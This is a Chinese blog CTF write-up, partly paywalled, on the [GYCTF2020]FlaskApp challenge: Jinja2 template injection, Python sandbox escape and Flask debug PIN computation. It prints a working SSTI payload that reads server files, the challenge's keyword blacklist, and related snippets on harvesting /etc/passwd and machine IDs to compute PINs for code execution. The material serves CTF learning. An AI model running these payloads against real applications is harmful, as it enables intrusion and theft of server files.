一天一道ctf 第38天（报错模板注入 python沙盒逃逸 pin码生成）

最新推荐文章于 2023-07-13 16:39:59 发布

scrawman

最新推荐文章于 2023-07-13 16:39:59 发布

阅读量788

点赞数 2

CC 4.0 BY-SA版权

本文链接：https://blog.youkuaiyun.com/scrawman/article/details/118931844

[GYCTF2020]FlaskApp
先得到{ {7*7}}的base64加密字符串，然后解密，输出no no no，看样子是被过滤了，这里可能有SSTI模板注入，主要是看怎么绕过过滤
在这里插入图片描述

随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210720115212441.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NjcmF3bWFu,size_16,color_FFFF

{
   % for c in [].__class__.__base__.__subclasses__() %}{
   % if c.__name__=='catch_warnings' %}{
   {
    c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{
   % endif %}{
   % endfor %}

还是把这串命令加密一下然后解密，得到源码
在这里插入图片描述
可以在里面找到waf，过滤了很多字符。也可以找到执行我们输入的base64字符串的代码，通过GET方法将输入的字符串保存在txt中，如果解密后绕过了waf，则执行flash().

 def waf(str): 
 black_list = ["flag","os&#34;,&#34;system&#34;,&#34;popen&#34;,&#34;import&#34;,&#34;eval&#34;,&#34;chr&#34;,&#34;request&#34;, &#34;subprocess&#34;,&#34;commands&#34;,&#34;socket&#34;,&#34;hex&#34;,&#34;base64&#34;,&#34;*&#34;,&#34;?&#34;] 
 for x in black_list : 
     if x in str.lower() : return 1

@app.route('/decode';,methods=['POST','GET']) 
def decode(): 
    if request.values.get('text')

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

scrawman

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp

ShenZ的博客

09-07

3421

ssti的payload还是不太会写… Flask debug 模式生成pin码计算pin所需要的值为： 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()

[GYCTF2020]FlaskApp 1(SSTI，PIN）

weixin_45577185的博客

10-20

1486

f12发现了提示，但是我对PIN没有了解所以没反应过来扫了一下网站，发现了一个网站打开非预期解：本题存在SSTI注入加密 {{7+7}} e3s3Kzd9fQ== 解密回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录： {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_

参与评论您还未登录，请先登录后发表或查看评论

关于ctf中flask算pin总结

arcuied

02-20

6516

flask pin的相关问题

pin-in-CTF:使用intel pin来求解一部分CTF challenge

05-09

pin-in-CTF 使用intel pin来求解一部分CTF challenges

ssti python 沙箱jinja2利用，PIN获取之[GYCTF2020]FlaskApp

qq_58970968的博客

08-20

521

对于非docker机每一个机器都会有自已唯一的id，linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i，有的系统没有这两个文件。对于docker机则读取/proc/self/cgroup，其中第一行的/docker/字符串后面的内容作为机器的id，首先判断是什么类型的ssti，再利用，这里通过报错抛出debug信息的内容判断：爆出的报错部分的代码里面的特殊函数；得到的Mac地址：print(int('去掉“：”后的地址',16))

CTF-RE dont_panic （pin二进制打桩暴力）

SuperGate的博客

07-13

1293

部分参考题解：http://eternal.red/2017/dont_panic-writeup/ 方便起见，题目文件名改成go 运行题目程序，发现flag是跟在命令行参数之后的。用IDA打开后发现没有找到main函数，因此选择在Linux下查看段信息： supergate@ubuntu:~/Desktop/task1$ readelf -S go 得到信息如下： Section ...

*CTF-2022 WEB

Blazing-Angel的博客

04-24

1068

oh-my-notepro python3.8 pin码计算发现sql注入，可以堆叠注入生成要素 username，通过getpass.getuser()读取，通过文件读取/etc/passwd modname，通过getattr(mod,“file”,None)读取，默认值为flask.app appname，通过getattr(app,“name”,type(app).name)读取，默认值为Flask moddir, 在flask库下app..

flask计算pin码

最新发布

weixin_63231007的博客

07-13

4536

python flask-pin码介绍 & CTF中 flask-pin码计算的应用

flask的pin码攻击——新版本下pin码的生成方式

qq_42303523的博客

04-17

4747

在打*CTF的时候，一道明显是flask的pin码生成进而RCE的题目卡了半天，最后发现是新版本的flask的pin码生成方式有了一定的改变，这里做一下记录。我们常用的生成pin码的脚本如下： import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get

CTF刷题

m_de_g的博客

06-01

492

BugKu——SSTI 1、判断是否存在ssti漏洞 2*8=16 说明存在ssti漏洞 List item 2、开始模板注入知道’’的类型是字符型。 3、接下来我们找其父类找到父类，父类是’object’ 4、因为只有一个’父类’，需要加一个下标， 5、找父类下的所有子类 {{’’.class.bases[0].subclasses()}} 6、接下来使用脚本，跑出那个子类中含有os模块运行find_func.py脚本输入字符串的地方，把所有的子类将其放入到其中，然后模块的话，直接

[*CTF2022]oh_my_lotto_revenge

Huamang的博客

04-21

2969

New 相对于oh_my_lotto，revenge进行了下面的更改这么做，我们能走的就只有RCE了，而这里唯一能操作的一个地方就是这里，可以操作环境变量 os.environ[lotto_key] = lotto_value 这里有几个非预期解，先看看预期解 Intented writeup 这里可以操控环境变量，那么我们能做的事情就很多了，预期解是操控HOSTALIASES修改hosts 因为他的wget是通过域名下载的 os.system('wget --content-disposition

CTF命令执行绕过总结

gou1791241251的博客

08-04

880

命令执行绕过命令总结

BUUCTF-模板注入专项刷题

m0_51563147的博客

02-27

3604

SSTI：目录简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行，但是题目过滤的不够严格导致.

ctf python大法好_浅谈flask与ctf那些事

weixin_32394247的博客

12-30

825

最近跑了培训写了点flask的session伪造，没能用上，刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。debug pin本地先起一个开启debug模式的服务：本机启动时会打印出如下：多次启动会发现打印的PIN码是相同的，分析源自参考链接，可以得出debug pin由六个值决定：用户flask.appFlaskflask目录下的一个app.py的绝对路径当前电脑的MAC地址，为...

[GYCTF2020]FlaskApp（SSTI）

qq_45521281的博客

06-09

3120

进入题目：是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面，思路应该是在加密页面输入payload进行加密，加密结果在解密页面进行解密，输出解密后的payload被渲染到页面输出后执行了payload。官方write up说看到根据hint1，失败乃成功之母，应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式，这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错，然后习惯性对base64解密页面进行报错实验，ba

2020年1月-*CTF比赛Web部分题解

读万卷书，行万里路。

01-22

1396

文章目录1 Web1.1 oh-my-note1.2 oh-my-socket2 总结3 附录 1 Web 由于期末考试和各种课设，有一段时间没有比赛了，做题时没有思路，感觉好菜呐～???? 1.1 oh-my-note 题目中给出源码： import string import random import time import datetime from flask import render_template, redirect, url_for, request, session, Flask f

HITCTF 2018 wp [我真是菜鸟]

Assassin

02-02

5952

WEB PHPreading 源码泄露，存在index.php.bak，，解一下base64知道 $flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm'); 输入得到flag BabyEval 看一下泄露了一部分源码 <!-- $str=@(str

[GYCTF2020]FlaskApp

feng的博客

11-27

2395

知识点 Flask模板注入中debug模式下pin码的获取和利用 WP 进入环境，根据题目的提示这是一道flask的题目，经过信息收集，在hint页面发现了pin，经过谷歌发现这题的思路大概就是，因为开启了debug模式，所以可以利用ssti注入读文件最终获得pin码，然后利用pin码进入debug模式的交互式命令行进行命令的执行。首先是要找到ssti的点。经过测试，发现是解码的那里，如果输入{{1+1}},解码后回显的结果是2，因此存在SSTI。但是经过测试，执行命令的SSTI注入方式被过滤了，按照

CTF中那些脑洞大开的编码和加密